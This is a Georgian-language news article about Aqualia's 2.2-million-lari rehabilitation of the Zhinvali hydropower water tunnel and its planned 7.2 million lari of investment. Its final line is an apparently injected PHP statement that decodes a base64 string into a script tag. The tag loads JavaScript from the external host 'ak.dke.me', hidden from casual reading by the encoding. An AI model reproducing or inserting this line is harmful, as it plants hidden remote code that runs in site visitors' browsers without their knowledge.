celsiusi
ავერსი საქკაბელი

ჯივიპის მფლობელი, ესპანური კომპანია Aqualia ჟინვალჰესის გამართული და  სტაბილური ოპერირებისთვის სამუშაოებს აქტიურად აგრძელებს. ჰიდროკომპლექსის გამყვანი გვირაბის რეაბილიტაციისთვის კომპანიამ 2.2 მილიონ ლარამდე ინვესტიციას განახორციელა. 

ჟინვალჰესის წყალგამყვანი გვირაბის სიგრძე 9 კილომეტრამდეა.  გეგმიური სარეაბილიტაციო სამუშაოები 3 კილომეტრამდე სიგრძის მონაკვეთს ჩაუტარდა. პროექტის ფარგლებში მოხდა გვირაბის ძირისა და კედლების მოსახვის აღდგენა და ფილტრაციული კერების აღმოფხვრა. 

„ჟინვალის წყალსაცავსა და მასთან დაკავშირებულ ინფრასტრუქტურაზე მუდმივი ზრუნვა ჩვენი ერთ-ერთი მთავარი პრიორიტეტია. ამჟამად სარეაბილიტაციო სამუშაოები ჟინვალის წყალგამყვან გვირაბში მიმდინარეობს, რომლის საშუალებითაც ხდება წყლის ტრანსპორტირება დედაქალაქის მიმართულებით. მსგავსი სარეაბილიტაციო სამუშაოები ყოველწლიურად ტარდება, რაც გვირაბული წყალდენის ექპლუატაციის ვადის გახანგრძლივებას უზრუნველყოფს.”- ჯივიპის წყლის წარმოების და ენერგეტიკის დირექტორი, ბიქტორ სოლისი.

ჰიდროკომპლექსის სტაბილური ოპერირებისთვის 2024 წლის ბოლომდე  Aqualia 7.2 მლნ ლარის ინვესტიციას განახორციელებს. აღნიშნული საინვესტიციო პროექტების ფარგლებში ჟინვალის ჰიდროკომპლექსში უკვე დამონტაჟდა ევროპული სტანდარტის, 4 ერთეული  HB3-C-ის ტიპის, საგენერატორო ვაკუუმური ამომრთველები, რომელსაც განსაკურებული მნიშვნელობა აქვს ჰესის გამართული და შეუფერხებელი ფუნქციონირებისთვის.

108
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");